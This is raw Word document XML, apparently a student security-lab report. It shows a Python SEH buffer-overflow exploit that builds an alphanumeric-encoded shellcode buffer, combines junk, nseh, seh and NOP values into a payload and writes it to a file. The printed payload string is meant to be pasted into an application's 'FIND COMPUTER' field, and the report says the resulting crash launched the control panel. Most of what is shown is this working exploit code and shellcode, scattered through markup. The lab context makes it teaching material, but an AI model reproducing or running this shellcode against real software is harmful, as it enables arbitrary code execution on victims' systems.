      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=  b</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34795882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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>xdd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>\xc7\xd9\x74\x24\xf4\x5d\x55\x59\x49\x49\x49\x49"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4539A9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b"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1D858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b"\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17957A8B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b"\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8AE06A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lastRenderedPageBreak/>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> += b"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x68\x68\x4d\x52"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D02C01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b"\x73\x30\x57\x70\x45\x50\x63\x50\x6e\x69\x4d\x35\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3518FA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b"\x51\x79\x50\x72\x44\x6e\x6b\x36\x30\x44\x70\x4c\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0BF6E8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b"\x51\x42\x64\x4c\x6e\x6b\x31\x42\x64\x54\x6e\x6b\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590BCBB7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b"\x72\x36\x48\x56\x6f\x6e\x57\x31\x5a\x66\x46\x35\x61"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3493167B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b"\x59\x6f\x6c\x6c\x67\x4c\x35\x31\x71\x6c\x53\x32\x56"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D22ED9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b"\x4c\x31\x30\x6a\x61\x68\x4f\x74\x4d\x36\x61\x38\x47"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5BFD38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b"\x7a\x42\x4a\x52\x36\x32\x30\x57\x4c\x4b\x53\x62\x36"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670E24A2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b"\x70\x6c\x4b\x32\x6a\x45\x6c\x6c\x4b\x50\x4c\x37\x61"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A04C25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b"\x30\x78\x4b\x53\x42\x68\x43\x31\x78\x51\x33\x61\x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3495F37F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b"\x6b\x73\x69\x45\x70\x35\x51\x69\x43\x4c\x4b\x51\x59"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AB109F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b"\x66\x78\x48\x63\x74\x7a\x77\x39\x4c\x4b\x50\x34\x6e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A99A85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b"\x6b\x77\x71\x49\x46\x35\x61\x59\x6f\x6c\x6c\x59\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D99DCC6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b"\x48\x4f\x34\x4d\x55\x51\x78\x47\x35\x68\x39\x70\x42"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B76688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b"\x55\x78\x76\x55\x53\x51\x6d\x39\x68\x55\x6b\x31\x6d"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E537A3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b"\x36\x44\x34\x35\x5a\x44\x33\x68\x6e\x6b\x43\x68\x51"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349445F3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b"\x34\x57\x71\x79\x43\x50\x66\x6e\x6b\x36\x6c\x42\x6b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374C5E09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b"\x6c\x4b\x42\x78\x75\x4c\x35\x51\x5a\x73\x4c\x4b\x76"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C0422F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b"\x64\x4e\x6b\x53\x31\x5a\x70\x6b\x39\x52\x64\x77\x54"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B7C06A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b"\x35\x74\x63\x6b\x53\x6b\x71\x71\x52\x79\x43\x6a\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255D9D51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b"\x61\x49\x6f\x49\x70\x63\x6f\x73\x6f\x61\x4a\x6c\x4b"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1368FB2E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b"\x55\x42\x68\x6b\x4c\x4d\x61\x4d\x32\x4a\x75\x51\x6c"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D78C384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b"\x4d\x4b\x35\x58\x32\x63\x30\x37\x70\x45\x50\x52\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF17472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b"\x43\x58\x30\x31\x4e\x6b\x32\x4f\x6c\x47\x49\x6f\x68"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360D1CEB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b"\x55\x4f\x4b\x38\x70\x68\x35\x49\x32\x33\x66\x50\x68"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301B459A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b"\x59\x36\x4e\x75\x4d\x6d\x4d\x4d\x4b\x4f\x58\x55\x45"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214A03CF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lastRenderedPageBreak/>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> += b"\x6c\x37\x76\x61\x6c\x76\x6a\x4f\x70\x79\x6b\x69\x70"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F80CE07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b"\x31\x65\x57\x75\x6f\x4b\x52\x67\x46\x73\x73\x42\x32"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6CB45D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b"\x4f\x70\x6a\x73\x30\x70\x53\x79\x6f\x6b\x65\x50\x63"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14503B1D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b"\x42\x4f\x72\x4e\x30\x74\x33\x42\x62\x4f\x50\x6c\x37"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F88D97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r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> += b"\x70\x41\x41"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5CD3B1" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A31EE1D" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2888ACF2" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">payload = junk + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nseh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>seh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>nops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E5F94A9" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D6DB94" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1601ACB8" w14:textId="74B2A1D7" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>f.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="03F7B696" w14:textId="77777777" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5124472C" w14:textId="4BD7D197" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31906A8B" w14:textId="7209AB36" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">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ë </w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>K@</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ÝÇÙ</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>t$</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ô</w:t>
      </w:r>
      <w:r w:rsidRPr="007B1918">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>]UYIIIIIIIIICCCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIilhhMRs0WpEPcPniM5VQyPrDnk60DpLKQBdLnk1BdTnkpr6HVonW1ZfF5aYollgL51qlS2VL10jahOtM6a8GzBJR620WLKSb6plK2jEllKPL7a0xKSBhC1xQ3anksiEp5QiCLKQYfxHctzw9LKP4nkwqIF5aYollYQHO4MUQxG5h9pBUxvUSQm9hUk1m6D45ZD3hnkChQ4WqyCPfnk6lBklKBxuL5QZsLKvdNkS1Zpk9RdwT5tckSkqqRyCjcaIoIpcosoaJlKUBhkLMaM2JuQlMK5X2c07pEPRpCX01Nk2OlGIohUOK8ph5I23fPhY6NuMmMMKOXUEl7valvjOpykip1eWuoKRgFssB2Opjs0pSyokePcBOrN0t3BbOPl7pAA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CB430A" w14:textId="77777777" w:rsidR="007B1918" w:rsidRPr="007B1918" w:rsidRDefault="007B1918" w:rsidP="007B1918">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F3DEE8" w14:textId="372741B6" w:rsidR="001C0DB8" w:rsidRDefault="00675D41" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675D41">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EAF8E23" wp14:editId="75DE5E0C">
            <wp:extent cx="5731510" cy="46951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D41">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECAF1E3" w14:textId="77FA20DD" w:rsidR="00675D41" w:rsidRDefault="007B1918" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Put this payload in the FIND COMPUTER input field and see the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1AEE2C" w14:textId="6638ABA7" w:rsidR="00704C1D" w:rsidRDefault="00A15519" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F5839">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia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271E1E3B" wp14:editId="20782345">
            <wp:extent cx="5731510" cy="46951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AE01" w14:textId="0DDF2F9D" w:rsidR="007B1918" w:rsidRDefault="007B1918" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Crashing of the application triggered the control panel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35982FE4" w14:textId="77777777" w:rsidR="00675D41" w:rsidRDefault="00675D41" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AAB043" w14:textId="4F5F2FD6" w:rsidR="00675D41" w:rsidRPr="00704C1D" w:rsidRDefault="00675D41" w:rsidP="00130FC5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00675D41">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BB009C" wp14:editId="0A708468">
            <wp:extent cx="4086225" cy="334739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0758" cy="335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D41" w:rsidRPr="00704C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F03358"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00CE26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625B78"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7B07E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956"/>
    <w:rsid w:val="0007091B"/>
    <w:rsid w:val="00130FC5"/>
    <w:rsid w:val="001C0DB8"/>
    <w:rsid w:val="001E3956"/>
    <w:rsid w:val="002462DA"/>
    <w:rsid w:val="002643D4"/>
    <w:rsid w:val="003D6662"/>
    <w:rsid w:val="004B7776"/>
    <w:rsid w:val="004F6810"/>
    <w:rsid w:val="00610F45"/>
    <w:rsid w:val="00613C56"/>
    <w:rsid w:val="00653A2A"/>
    <w:rsid w:val="00675D41"/>
    <w:rsid w:val="00704C1D"/>
    <w:rsid w:val="007B1918"/>
    <w:rsid w:val="007C675E"/>
    <w:rsid w:val="00A15519"/>
    <w:rsid w:val="00A748C0"/>
    <w:rsid w:val="00B638A4"/>
    <w:rsid w:val="00BB1532"/>
    <w:rsid w:val="00BD1F17"/>
    <w:rsid w:val="00C13CE3"/>
    <w:rsid w:val="00C86873"/>
    <w:rsid w:val="00D276D8"/>
    <w:rsid w:val="00D632A7"/>
    <w:rsid w:val="00DB50D2"/>
    <w:rsid w:val="02160D53"/>
    <w:rsid w:val="13BFA56E"/>
    <w:rsid w:val="5326D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BDB70"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A353CF44-EE3D-4779-A316-3DC0400AE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0F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77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773CA7B58CB742AE325175108AEBE9" ma:contentTypeVersion="2" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="9a16d019ef6c7478527427960c3ca490">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="01e6aae9-b236-437a-8d13-d697c8e2323c" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7340df6993f91029a45b926439a71664" ns2:_="">
    <xsd:import namespace="01e6aae9-b236-437a-8d13-d697c8e232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e6aae9-b236-437a-8d13-d697c8e232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07A6231-9B5E-4770-BE2B-0AE9166B5E6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0419924-098F-48E6-8189-3C9BDC41918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9961474-E6D7-4846-9AAF-FC59CA0168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e6aae9-b236-437a-8d13-d697c8e232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1675</Words>
  <Characters>9553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Sibi Chakkaravarthy</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>L̥</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <cp:lastPrinted>2021-06-02T17:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-06-13T19:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-13T19:56:00Z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0x01010030773CA7B58CB742AE325175108AEBE9</vt:lpwstr>
  </property>
</Properties>
</file>